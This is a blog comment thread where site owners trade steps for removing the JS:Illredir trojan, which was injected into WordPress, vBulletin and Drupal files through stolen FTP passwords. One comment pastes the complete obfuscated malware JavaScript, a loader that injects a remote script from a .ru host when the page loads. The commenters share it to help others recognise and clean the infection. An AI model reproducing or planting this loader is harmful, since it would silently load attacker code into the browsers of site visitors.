    Hi LuisTim & Barak Here is my steps that I did to fix my site: 1- Full antivirus scan to my computer 2- Uninstall the antivirus (After that don't open your site via your browser, because the virus will be downloaded to your PC if you did so) 3- Download your entire site using your FTP program (I'm using Filezilla, and I like it because it tells you if there's some files failed to download) REMEMBER not to open any page from your downloaded files via internet explorer or any other browser, because the virus will also be downloaded to your PC if you did so 4- Edit your files using your HTML editor as I explained in the last post 5- Before you upload your fixed files, re-install your antivirus to make sure that you cleaned every infected file 6- If everything ok, delete the files from your host 7- Upload your fixed files Don't forget to check all the functions in your site like scripts, text editors, to make sure that everything ok and that the virus didn't damage any files, and if it did, you will have to replace the infected files with a new ones, as i said in the last post; in my forum (VBulletin) I had to replace the files in the “clientscript” folder with the original files that came with the forum when I bought it, and I also replaced some other scripts' files outside the forum I know it will take some times, but I spent more that 4 days searching the web for a solution but I didn't find any, so I got this idea and it works, it was just 1 hour of work except the time of download and upload And sorry for being late to answer you, but I've just back from work Best Regards BokraLena.com

  • Chuck

    Hey All - I too was infected with the JS:Illredir [Trj] trojan on two of my sites using the avast free antivirus program. My two sites are hosted at 1and1.com. got the same pat answers to a solution, increase password strength, they took no responsibility at all. Anyway I found that the only true fix was to edit the infected files by hand by removing the ansylary code at the bottom of each infected page. (like the code referenced in the above responses - yes it is easy, but if your site is large it could take a bit of time). If you use a site editing prgram like dreamweaver you may be able to replace the code string with a space be doing a search and replce throughtout the entire site. that show speed things up a bit. BE SURE TO CHECK ALL JAVASCRIPT JS FILES!!! Not just your php & html files. The code WILL BE THER ALSO and if not deleted from those files will re-propogate through your site once again...once you have cleaned up all files reset your passwords with type sensitive alpha numeric charaters. IF YOU USE ANY OPEN SOURCE PROGRAMS CHANGE ANY STANDARD PASSWORDS AND FOLDER NAME SETTINGS WHERE EVER YOU CAN! Hope this helps. Good luck to you all. Blessings.

  • Arturo

    Just received letter of deactivation from bluehost. I called them and asked what the reason was. sure enough, it was because of those stupid js redirect trojans. I've been at it the whole day trying to clean my files manually.

  • is there something we can use to fix it?

  • fanta78

    Hi Zyen and everyone, I got almost the same issue on one of my Wordpress blog last week-end. A local anti-malware software (Trend Micro) found out this : Virus JS:Illredir-AQ [Trj] (Engine B). Some major php files where infected, as well as most of the .js standard wordpress files, plus some plugins js files too. I get rid of this infection by reloading the original Worpdress files over it, plus the infected plugins original files. The database was unaffected. The malware was sending some requests to floridaorigin.at and was composed by a long javascript line added at the end of the infected files. It looked like this : var i='';var I="";var N_=new Date();var FH;if(FH!='uj' && FH!='Wf'){FH=''};.... I read in the comment that this malware could have used the ftp client on a pc to infect the wordpress install. Is this behavior confirmed ? Thanks !

  • fanta78

    I forgot to mention that the malware has added a new file in the /wp-admin/js folder, named users.js I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.

  • Miguel

    Now there is another "flavour" of this f*cking trojan. AVAST detects it as "JS:Illredir-BL". In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spitted out) and therefore I noticed the presence of these weird JS lines at the end of my files. It seems to use FTP client stored passwords (filezilla's in my case) to connect to every site and modify files. It is been a pain in the ass to fix all the mess this shit has done. The malware code is something like: YS=["r","Ro"];this.c=11526;this.c-=10;l={d:"K"};var T={};var y=document;var b="b";var Yi="Yi";var R=new String("body6mNV".substr(0,4));var ln=new Array();var _e='';var z=null;var cU=["vA"];var s="sc"+"ri"+"pt";var q=window;this.P=43688;this.P++;var qG;var CB="";function i(){mT={M:"rx"};this.If='';var X=String("]");var H='';var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=["S_","Mo"];this.zO=49795;this.zO+=11;var Z="x2fx62x72x61x6dx6ax6ex65x74x2dx63x6fx6dx2fx67x6fx6fx67x6cx65x2ex63x6fx6dx2fx6cx65x6fx2ex6fx72x67x2ex70x68x70";this.g=25187;this.g+=62;var Jv="Jv";var X=String("]");Ur=29560;Ur--;var Nu=new Array();Ql=60522;Ql--;this.WX=false;function _(L,h){var Yx=new Array();var o="[";Vn=6775;Vn++;o+=h;o+=X;lR=["e","vH"];var V=new B(o, new String("gKaW6".substr(0,1)));try {var V_='WH'} catch(V_){};return L[new String("rep"+"lacgj8".substr(0,3)+"e")](V, H);Mm=41961;Mm--;};try {var xu='vu'} catch(xu){};try {var tm='IH'} catch(tm){};var CN="CN";var w=940941-932861;var XG=String("http:"+"//nos"+"ypipe"+".ru:");this.qS='';var Bv=8354;z=String("onl"+"oad");cz=["Ni","fv","RD"];var VU='';var TG=["uh"];Fq={};var v=_('cGrQeUaOtBewEOlOeImPeSnwtw','PsSIOGDyQiUoFqTBwZX');var _n=_('aQp6pKe0nud0C8hui1l3du','38uqo0JwM1KQ6V');qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX='PS'} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os='sN'} catch(os){};var D="src2md".substr(0,3);cUe={xf:"GK"};var m=_('d1e1fpeArZ','1Xi_pZA');this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:"WS"};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN="VN";gL=["hu","wM","za"];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw='';var kA=["KP","xb","gF"];i();this.Ss=44880;this.Ss++;var Ek="";var Sv=["yb","FS"];q[z]=qG;WY=32921;WY-=67; Hope this helps someone.

  • Yohanes Supriyato

    nice...thank for information.

  • Marco

    i have a server where some sites were infected, how can i secure the server so this doesnt happen again?

  • Tess

    Hi, Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this: Object: my website folderjavascriptdate.js Infection: JS:Illredir-CB[Trj] Action: Connection aborted Process: c:Program FilesIEiexplore.exe Can anybody help me how to remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.

  • muwko

    it was very interesting to read. I want to quote your post in my blog. It can? And you et an account on Twitter?

  • Minnie Eichholz

    I posted concerning earlier.

  • Website

    In IE9, Microsoft has integrated its SmartScreen Filter with the new Download Manager feature to bolster security.

  • jayson

    Hi mike..please help me..I dont know how i can fix this problem, whenever i access my wp blog - http://blog.gohunt.ph/wp-admin it redirects to this URL - http://blog.gohunt.ph/wp-login.php?redirect_to=http://blog.gohunt.ph/wp-admin/&reauth=1 My client use BLUEHOST and i dont know if our programmer know this issues in accordance to their hosting provider

  • Fred

    Merci pour ce post.

  • Pingback: Virus Support
  • Pingback: Jasa Adsense
  • Pingback: domains
  • Pingback: syllubus
  • Pingback: Web Hosting
  • Pingback: soft for windows
  • Pingback: joomla
  • Rod Griffis

    Thanks so much Mike. I just ran your script, and it worked perfectly. I have been trying to figure out what to do for a couple of weeks. You're a genius.

Leave a comment

Your email address will not be published. Required fields are marked *